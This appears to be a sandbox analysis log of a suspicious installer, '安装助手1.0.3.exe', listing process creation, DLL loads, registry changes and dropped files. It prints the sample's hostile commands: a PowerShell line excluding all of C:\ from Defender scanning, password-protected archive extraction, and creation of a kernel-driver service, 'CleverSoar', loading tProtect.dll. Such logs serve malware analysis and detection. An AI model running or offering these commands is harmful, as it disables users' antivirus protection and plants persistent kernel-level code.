Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (identical entry repeated 27 times)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static file information: File size 7495744 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000E.00000003.2244717794.0000000001500000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000E.00000003.2244632805.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.14.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 11_2_009F57D0
Source: update.vac.2.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr | Static PE information: real checksum: 0x0 should be: 0x343ce5
Source: update.vac.8.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343ce5
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: real checksum: 0x0 should be: 0x72e436
Source: hrsw.vbc.8.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.14.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.2.dr | Static PE information: section name: .00cfg
Source: update.vac.2.dr | Static PE information: section name: .voltbl
Source: update.vac.2.dr | Static PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr | Static PE information: section name: .didata
Source: 7zr.exe.8.dr | Static PE information: section name: .sxdata
Source: update.vac.8.dr | Static PE information: section name: .00cfg
Source: update.vac.8.dr | Static PE information: section name: .voltbl
Source: update.vac.8.dr | Static PE information: section name: .8Tk
Source: hrsw.vbc.8.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.8.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.8.dr | Static PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C2E86EB push ecx; ret 8_2_6C2E86FE
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C190F00 push ss; retn 0001h 8_2_6C190F0A
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B6F10 push eax; ret 8_2_6C3B6F2E
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C31B9F4 push 004AC35Ch; ret 8_2_6C31BA0E
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B7290 push eax; ret 8_2_6C3B72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009745F4 push 00A1C35Ch; ret 11_2_0097460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0FB10 push eax; ret 11_2_00A0FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0FE90 push eax; ret 11_2_00A0FEBE
Source: update.vac.2.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.8.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.8.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
